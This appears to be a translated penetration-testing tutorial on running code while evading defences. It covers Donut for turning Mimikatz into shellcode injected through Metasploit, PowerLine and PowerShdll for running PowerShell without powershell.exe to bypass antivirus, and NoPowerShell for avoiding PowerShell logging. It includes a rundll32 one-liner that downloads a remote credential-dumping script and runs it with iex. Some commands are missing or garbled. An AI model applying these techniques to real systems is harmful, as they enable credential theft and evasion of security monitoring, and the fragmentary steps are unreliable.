Penetration techniques
msf+Donut interactive execution program
Introduction
ToolDunt
Donut generates x86 or x64 Shellcode from VBScript, JScript, EXE, DLL (including .NET assembly) files. This shellcode can be injected into arbitrary Windows processes for in-memory execution.
Instructions
-
First msf generates a backdoor program, execute
-
then execute
/donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin
-a: specifies the number of digits, 2 bits and 64 bits
-o: specifies the outputget one
-
Executing the module with msf
get an interactive mimikatz
run powershell method without powershell
PowerLine
Introduction
It is a tool written in c#, which supports local command line calls and remote calls. It can call PowerShell scripts without directly calling PowerShell. The advantages are as follows:
- Automatically identify win7 and win10 systems
- Easy to use, no complicated ide required
- Automatic xor encoding
- …
use
-
First pull the project to the local, then run the build.bat file
-
Then fill in the address of the powershell script you need to call in the UserConf.xml file. By default, it comes with powerup, powerview, Mimikatz, etc., just add your ps script address according to the format given by him.
-
After the addition is complete, run PLBuilder.exe to build
PowerShdll
Introduction
It mainly uses dll to run powershell without connecting to powershell.exe, so it has a certain bypassAV capability. Of course, it can also run rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32 under these programs .exe or use the separate exe given by the author to execute
use
- Use PowerShdll -i to enter the interactive mode, then you get an interactive PS environment, you can execute any powershell command
-
dll version usage
rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;
Nopowershell
Introduction
is a tool implemented in C# that supports the execution of PowerShell-like commands while being invisible to any PowerShell logging mechanisms. At the same time, the cna script under CS is also provided.
use
.\NoPowerShell.exe
Run the available version and help command directly